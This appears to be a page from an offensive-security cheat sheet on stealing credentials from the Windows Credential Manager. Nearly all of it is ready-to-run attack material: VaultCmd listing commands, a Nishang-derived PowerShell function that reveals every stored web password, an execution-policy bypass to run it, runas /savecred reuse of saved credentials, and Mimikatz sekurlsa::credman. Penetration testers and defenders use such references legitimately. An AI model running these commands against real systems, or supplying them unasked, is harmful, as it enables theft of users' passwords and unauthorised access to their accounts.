Credential manager

Access Windows Vault

VaultCmd /list # List all credentials

VaultCmd /listproperties:"Web Credentials" # List properties of Web Credentials

VaultCmd /listcreds:"Web Credentials" # List credentials of Web Credentials

Dump Credentials from Windows Vault

PowerShell Script: Get-WebCredentials.ps1

# Nishang script to retrieve web credentials from Windows vault
# Requires PowerShell v3+ and elevated privileges
function Get-WebCredentials {
    # Load the PasswordVault class
    $ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
    $VaultObj = new-object Windows.Security.Credentials.PasswordVault

    # Retrieve all credentials and reveal passwords
    $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }
}

Execution Steps

powershell -ex bypass # Run PowerShell in bypass mode
Import-Module Get-WebCredentials.ps1
Get-WebCredentials # Execute the script to retrieve credentials

RunAs Command

cmdkey /list # List saved credentials
runas /savecred /user:<DOMAIN>\<USER> <COMMAND> # Use credentials

Mimikatz

mimikatz # privilege::debug
mimikatz # sekurlsa::credman

PreviousLocal Security Authority Subsystem Service (LSASS)NextDomain Controller

Last updated 7 months ago